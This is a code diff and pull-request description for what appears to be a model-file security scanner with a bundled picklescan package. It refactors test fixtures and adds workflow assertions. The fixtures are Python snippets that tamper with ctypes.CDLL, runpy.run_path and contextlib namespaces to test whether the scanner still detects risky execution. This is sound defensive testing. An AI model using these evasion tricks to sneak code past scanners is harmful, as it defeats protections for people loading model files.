@@ -1604,9 +1618,11 @@ def test_scan_zip_preserves_ctypes_risk_after_qualified_control_target(tmp_path:
         "for (c.CDLL,) in [(c.CDLL,), (print,)]:\n    pass\n",
         "import contextlib\nc.CDLL = print\nwith contextlib.nullcontext(print) as c.CDLL:\n    pass\n",
         "import contextlib\nc.CDLL = print\nwith contextlib.nullcontext(enter_result=print) as c.CDLL:\n    pass\n",
-        "import contextlib\nc.CDLL = print\nreal = contextlib.nullcontext\ncontextlib.__dict__.pop('nullcontext')\n"
-        "contextlib.__dict__.setdefault('nullcontext', real)\n"
-        "with contextlib.nullcontext(enter_result=print) as c.CDLL:\n    pass\n",
+        (
+            "import contextlib\nc.CDLL = print\nreal = contextlib.nullcontext\ncontextlib.__dict__.pop('nullcontext')\n"
+            + "contextlib.__dict__.setdefault('nullcontext', real)\n"
+            + "with contextlib.nullcontext(enter_result=print) as c.CDLL:\n    pass\n"
+        ),
     ],
 )
 def test_scan_zip_preserves_safe_final_qualified_control_target(tmp_path: Path, mutation: str) -> None:
@@ -2061,8 +2077,10 @@ def test_scan_zip_preserves_restored_runpy_execution_after_static_overwrite(tmp_
         "del runpy.__dict__['run_path']\nrunpy.__dict__.setdefault('run_path', original)\n",
         "runpy.__dict__.pop('run_path')\nrunpy.__dict__.setdefault('run_path', original)\n",
         "import builtins\nbuiltins.delattr(runpy, 'run_path')\nrunpy.__dict__.setdefault('run_path', original)\n",
-        "import builtins\nremove = builtins.delattr\nremove(runpy, 'run_path')\n"
-        "runpy.__dict__.setdefault('run_path', original)\n",
+        (
+            "import builtins\nremove = builtins.delattr\nremove(runpy, 'run_path')\n"
+            + "runpy.__dict__.setdefault('run_path', original)\n"
+        ),
     ],
 )
 def test_scan_zip_preserves_restored_runpy_execution_after_namespace_overwrite(tmp_path: Path, restore: str) -> None:
@@ -2104,8 +2122,10 @@ def test_scan_zip_preserves_restored_runpy_execution_after_namespace_overwrite(t
         "del runpy.__dict__['run_path']\nrunpy.__dict__.setdefault('run_path', len)\n",
         "runpy.__dict__.pop('run_path')\nrunpy.__dict__.setdefault('run_path', len)\n",
         "import builtins\nbuiltins.delattr(runpy, 'run_path')\nrunpy.__dict__.setdefault('run_path', len)\n",
-        "import builtins\nremove = builtins.delattr\nremove(runpy, 'run_path')\n"
-        "runpy.__dict__.setdefault('run_path', len)\n",
+        (
+            "import builtins\nremove = builtins.delattr\nremove(runpy, 'run_path')\n"
+            + "runpy.__dict__.setdefault('run_path', len)\n"
+        ),
     ],
 )
 def test_scan_zip_preserves_safe_runpy_namespace_overwrite(tmp_path: Path, overwrite: str) -> None:
@@ -3619,8 +3639,10 @@ def test_scan_zip_allows_shadowed_direct_python_member_primitives(tmp_path: Path
             "ctypes.LibraryLoader.__setattr__ = restore\n"
             "loader._dlltype\nrunpy.run_path('safe')\n"
         ),
-        "import ctypes\nimport runpy\nloader = ctypes.LibraryLoader(len)\nrunpy.run_path = print\n"
-        "del loader._dlltype\nloader._dlltype\nrunpy.run_path('safe')\n",
+        (
+            "import ctypes\nimport runpy\nloader = ctypes.LibraryLoader(len)\nrunpy.run_path = print\n"
+            + "del loader._dlltype\nloader._dlltype\nrunpy.run_path('safe')\n"
+        ),
         (
             "import ctypes\nimport runpy\nloader = ctypes.LibraryLoader(len)\n"
             "loader.label = object()\nrunpy.run_path = print\n"

--- a/tests/test_perf_workflow.py
+++ b/tests/test_perf_workflow.py
@@ -334,6 +334,7 @@ def test_docs_workflow_rejects_invalid_utf8_and_invalid_revisions(tmp_path: Path
     )
     assert invalid_utf8_result.returncode != 0
     assert "Changed filename is not valid UTF-8" in invalid_utf8_result.stderr
+    assert not changed_json.exists()
 
     invalid_revision_result = _run_node_script(
         collect_script,
@@ -347,6 +348,7 @@ def test_docs_workflow_rejects_invalid_utf8_and_invalid_revisions(tmp_path: Path
     )
     assert invalid_revision_result.returncode != 0
     assert "Invalid workflow diff boundary" in invalid_revision_result.stderr
+    assert not changed_json.exists()
 
 
 @pytest.mark.skipif(os.name == "nt", reason="Git empty-tree behavior is covered on POSIX CI")


### PR DESCRIPTION
## Summary

- resolve the remaining actionable static-analysis findings across the root package and standalone picklescan package
- remove unused constants and inert locals
- make import and string-concatenation intent explicit
- preserve picklescan's fail-closed behavior when invocation classification fails
- keep useful known-size stream tests readable without adding low-value abstractions

## Validation

- full Ruff lint and format checks passed
- changed-path mypy passed
- picklescan API/known-size/call-graph suite: 337 passed, 2 skipped
- JIT detector suite: 27 passed
- scanner payload suites: 76 passed
- network detector suite: 10 passed
- full mypy only reported the five pre-existing macOS xattr typing errors in `modelaudit/cli.py` and `tests/test_cli.py`

The broad repository test lane was sampled to 24%; focused changed-path coverage is green and CI will run the complete supported matrix.

## Follow-up quality triage

- assert invalid UTF-8 and invalid-revision workflow inputs do not leave a changed-files manifest
- Ruff and targeted mypy pass; the invalid-byte fixture remains covered by Linux CI because Darwin rejects that filename at filesystem creation